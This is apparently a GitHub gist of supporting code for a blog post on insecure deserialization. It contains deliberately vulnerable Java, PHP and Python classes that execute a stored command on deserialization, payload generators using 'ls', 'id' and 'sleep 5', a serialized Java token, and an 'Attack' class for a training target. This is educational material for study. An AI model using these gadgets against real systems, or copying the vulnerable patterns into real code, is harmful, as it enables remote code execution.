Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Supporting material for the Insecure Deserialization blog post https://thehackerish.com/insecure-deserialization-explained-with-examples
The token will not work because the vulnerable class checks if the token is older than 10 minutes. You need to generate one yourself using the instructions on the blog post: https://thehackerish.com/insecure-deserialization-explained-with-examples
rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAICAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfkAhoPDgwkiz74eHQAB3NsZWVwIDV0AAVkdW1teQ==
import java.io.*;
public class JavaDeserial{
public static void main(String args[]) throws Exception{
FileInputStream fis = new FileInputStream("/tmp/normalObj.serial");
ObjectInputStream ois = new ObjectInputStream(fis);
NormalObj unserObj = (NormalObj)ois.readObject();
ois.close();
}
}
class NormalObj implements Serializable{
public String name;
public NormalObj(String name){
this.name = name;
}
private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException{
in.defaultReadObject();
System.out.println(this.name);
}
}
class VulnObj implements Serializable{
public String cmd;
public VulnObj(String cmd){
this.cmd = cmd;
}
private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException{
in.defaultReadObject();
String s = null;
Process p = Runtime.getRuntime().exec(this.cmd);
BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
while ((s = stdInput.readLine()) != null) {
System.out.println(s);
}
}
}
import java.io.*;
public class JavaSerial{
public static void main(String args[]) throws Exception{
VulnObj vulnObj = new VulnObj("ls");
FileOutputStream fos = new FileOutputStream("/tmp/normalObj.serial");
ObjectOutputStream os = new ObjectOutputStream(fos);
os.writeObject(vulnObj);
os.close();
}
}
class VulnObj implements Serializable{
public String cmd;
public VulnObj(String cmd){
this.cmd = cmd;
}
}
class DangerousClass {
function __construct() {
$this->cmd = "id";
}
function __destruct() {
echo passthru($this->cmd);
}
}
class NormalClass {
function __construct() {
$this->name = "bob";
}
function __destruct() {
echo $this->name;
}
}
$serial = file_get_contents('/tmp/serial');
unserialize($serial);
class DangerousClass {
function __construct() {
$this->cmd = "ls";
}
function __destruct() {
echo passthru($this->cmd);
}
}
$a = new DangerousClass();
$b = serialize($a);
file_put_contents("/tmp/serial", $b);
import pickle
with open('/tmp/serial', 'r') as f:
pickle.loads(f.read())
import pickle
class VulnPickle(object):
def __reduce__(self):
import os
return (os.system,("id",))
a = pickle.dumps(VulnPickle())
with open('/tmp/serial', 'w') as f:
f.write(a)
package org.dummy.insecure.framework;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
public class Attack {
public static void main(String args[]) throws Exception{
VulnerableTaskHolder vulnObj = new VulnerableTaskHolder("dummy", "sleep 5");
FileOutputStream fos = new FileOutputStream("serial");
ObjectOutputStream os = new ObjectOutputStream(fos);
os.writeObject(vulnObj);
os.close();
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.